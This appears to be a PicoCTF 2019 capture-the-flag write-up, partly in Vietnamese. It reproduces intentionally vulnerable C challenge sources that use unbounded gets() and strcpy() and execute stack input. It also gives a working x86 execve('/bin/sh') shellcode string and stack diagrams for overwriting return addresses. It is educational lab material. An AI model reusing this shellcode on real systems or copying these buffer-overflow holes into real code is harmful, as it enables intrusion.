### PicoCTF2019

### General skills

### PWNABLE

## handy-shellcode

1. Description

$clues

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#define BUFSIZE 148
#define FLAGSIZE 128
/* Challenge helper: read one line into the caller's buffer and echo it back.
 * buf: storage owned by the caller (main() passes a BUFSIZE-byte stack array).
 * gets() takes no length argument, so any line longer than that array overruns
 * the caller's stack frame; gets() was removed from the language in C11 and the
 * bounded replacement is fgets(buf, size, stdin). The unbounded read is the
 * subject of the challenge. */
void vuln(char *buf){
    gets(buf);
    puts(buf);
}
/* Entry point: reads bytes from stdin and then executes them as machine code.
 * Returns 0 on the normal path; whatever the executed bytes do otherwise.
 * Note: the curly quotes in the string literals below are an artifact of the
 * page's copy/paste — they are not valid C and were presumably plain " in the
 * original source. */
int main(int argc, char **argv){
    /* Unbuffered stdout so the prompts are visible before control leaves main(). */
    setvbuf(stdout, NULL, _IONBF, 0);

    // Set the gid to the effective gid
    // this prevents /bin/sh from dropping the privileges
    gid_t gid = getegid();
    setresgid(gid, gid, gid);   /* return value is not checked */

    char buf[BUFSIZE];
    puts(“Enter your shellcode:”);
    vuln(buf);   /* unbounded gets() into buf; see vuln() */
    puts(“Thanks! Executing now…”);

    /* Casts the stack buffer to a function pointer and calls it: the bytes the
     * user typed are executed directly. This can only work when the stack is
     * mapped executable (NX/DEP disabled) — presumably how the challenge binary
     * is built; confirm with the build flags. */
    ((void (*)())buf)();
    puts(“Finishing Executing Shellcode. Exiting now…”);

    return 0;
}
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80

## practice-run-1

## OverFlow 0

1. Description

  • Find a way to trigger the flag to print
  • If you try to do the math by hand, maybe try and add a few more characters. Sometimes there are things you aren’t expecting.

2. Solution

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#define FLAGSIZE_MAX 64

/* Global filled from flag.txt by main() and printed by the SIGSEGV handler. */
char flag[FLAGSIZE_MAX];

/* SIGSEGV handler installed by main(): on a crash, write the flag to stderr
 * and exit. This is the challenge's intended win path — an overrun in vuln()
 * that corrupts the saved return address typically faults on return, and the
 * handler then reveals the flag. Note that fprintf(), fflush() and exit() are
 * not async-signal-safe (CERT SIG30-C); tolerable in a CTF harness, not in
 * production code.
 * sig: the delivered signal number (unused). */
void sigsegv_handler(int sig) {
    fprintf(stderr, “%s\n”, flag);
    fflush(stderr);
    exit(1);
}
/* Copies input into a fixed 128-byte stack buffer with strcpy(), which stops
 * only at the NUL terminator — there is no length check at all. main() passes
 * argv[1], so an argument of 128 bytes or more overwrites whatever sits above
 * buf in the frame (saved registers, return address). A bounded alternative is
 * snprintf(buf, sizeof buf, "%s", input) after validating the input length. */
void vuln(char *input){
    char buf[128];
    strcpy(buf, input);
}
/* Entry point: loads the flag into the global, arms the SIGSEGV handler, then
 * hands argv[1] to vuln(). Returns 0, or exits via the handler on a crash.
 * Two page artifacts: the curly quotes in the literals come from copy/paste,
 * and this listing lacks <unistd.h>/<sys/types.h>, which getegid(),
 * setresgid() and gid_t need — presumably dropped when the source was pasted. */
int main(int argc, char **argv){

    FILE *f = fopen(“flag.txt”,”r”);
    if (f == NULL) {
        printf(“Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\n”);
        exit(0);
    }
    /* Reads at most FLAGSIZE_MAX-1 bytes into the global; f is never closed
     * (harmless here, the process exits shortly afterwards). */
    fgets(flag,FLAGSIZE_MAX,f);
    /* From here on any segfault prints the flag — see sigsegv_handler(). */
    signal(SIGSEGV, sigsegv_handler);

    gid_t gid = getegid();
    setresgid(gid, gid, gid);   /* return value is not checked */

    if (argc > 1) {
        /* argv[1] is untrusted and unbounded; vuln() strcpy()s it into a
         * 128-byte stack buffer. */
        vuln(argv[1]);
        printf(“You entered: %s”, argv[1]);
    }
    else
        printf(“Please enter an argument next time\n”);
    return 0;
}

### OverFlow 1

1. Description

  • Take control that return address
  • Make sure your address is in Little Endian.

2. Solution

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include "asm.h"
#define BUFFSIZE 64
#define FLAGSIZE 64
/* Reads flag.txt into a stack buffer and prints it. Never called on the normal
 * path — it is the function the overflow in vuln() is meant to redirect to.
 * Two defects worth naming: printf(buf) uses file content as the format string
 * (CERT FIO30-C; the safe form is printf("%s", buf) or fputs(buf, stdout)),
 * and the FILE* is never fclose()d. */
void flag() {
    char buf[FLAGSIZE];
    FILE *f = fopen("flag.txt","r");
    if (f == NULL) {
        printf("Flag File is Missing. please contact an Admin if you are running this on the shell server.\n");
        exit(0);
    }
    fgets(buf,FLAGSIZE,f);
    printf(buf);
}
/* Reads a line into a BUFFSIZE (64-byte) stack buffer with gets() — no length
 * bound, so a longer line overwrites the saved frame pointer and the return
 * address stored above buf. get_return_address() comes from "asm.h" (not
 * shown); judging by the format string it presumably returns the address
 * vuln() is about to return to — confirm in asm.h. */
void vuln(){
    char buf[BUFFSIZE];
    gets(buf);
    printf("Woah, were jumping to 0x%x !\n", get_return_address());
}
/* Entry point: unbuffered stdout, keep the effective gid, prompt, then call
 * vuln(). Returns 0 on the normal path. */
int main(int argc, char **argv){
    setvbuf(stdout, NULL, _IONBF, 0);
    gid_t gid = getegid();
    setresgid(gid, gid, gid);   /* return value is not checked */
    puts("Give me a string and lets see what happens: ");
    vuln();   /* unbounded gets() into a 64-byte stack buffer */
    return 0;
}
+------------------------------+
| |
| return address |
| |
+------------------------------+
| |
| base address |
|AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|
+------------------------------+
|AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|
|AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|
|AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|
+------------------------------+

### NewOverFlow 1, 2

### slippery-shellcode

1. Description

2. Solution

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#define BUFSIZE 512
#define FLAGSIZE 128
/* Challenge helper: read one line into the caller's buffer and echo it back.
 * buf: storage owned by the caller (main() passes a BUFSIZE-byte stack array).
 * gets() has no length argument, so a line longer than that array overruns the
 * caller's stack frame; it was removed from the language in C11 and the bounded
 * replacement is fgets(buf, size, stdin). */
void vuln(char *buf){
    gets(buf);
    puts(buf);
}
/* Entry point: reads user bytes into buf, then transfers control to
 * buf + offset with offset in 1..256. Returns 0 on the normal path.
 * The curly quotes in the string literals below are an artifact of the page's
 * copy/paste; the original source presumably used plain ". */
int main(int argc, char **argv){
    setvbuf(stdout, NULL, _IONBF, 0);
    // Set the gid to the effective gid
    // this prevents /bin/sh from dropping the privileges
    gid_t gid = getegid();
    setresgid(gid, gid, gid);   /* return value is not checked */
    char buf[BUFSIZE];
    puts(“Enter your shellcode:”);
    vuln(buf);   /* unbounded gets() into buf; see vuln() */
    puts(“Thanks! Executing from a random location now…”);
    /* rand() is never seeded in this listing (no srand() call), so the
     * "random" offset is the same on every run. Range is 1..256, i.e. up to
     * the first 256 bytes of the 512-byte buffer are skipped. */
    int offset = (rand() % 256) + 1;
    /* Executes the input bytes starting at buf+offset; requires an executable
     * stack (NX/DEP disabled) — presumably how the challenge binary is built. */
    ((void (*)())(buf+offset))();
    puts(“Finishing Executing Shellcode. Exiting now…”);
    return 0;
}

### OverFlow 2

1. Description

2. Solution

+---------------------------------+
|.................................|
+---------------------------------+
| |
| return address of vuln |
| |
+---------------------------------+
| |
| overflowed buf |
| |
+---------------------------------+
|.................................|
+---------------------------------+
===================================
===================================
+---------------------------------+
|.................................|
+---------------------------------+
| |
| arg2 | push arg2
| |
+---------------------------------+
| |
| arg1 | push arg1
| |
+---------------------------------+
| |
| return address of flag | push the next eip (dummy value)
| |
+---------------------------------+
| base address |
| |
+---------------------------------+
  • push các giá trị được truyền theo chiều ngược lại
  • push vào ret address của instruction kế tiếp để lúc trở về có thể tiếp tục được flow của chương trình
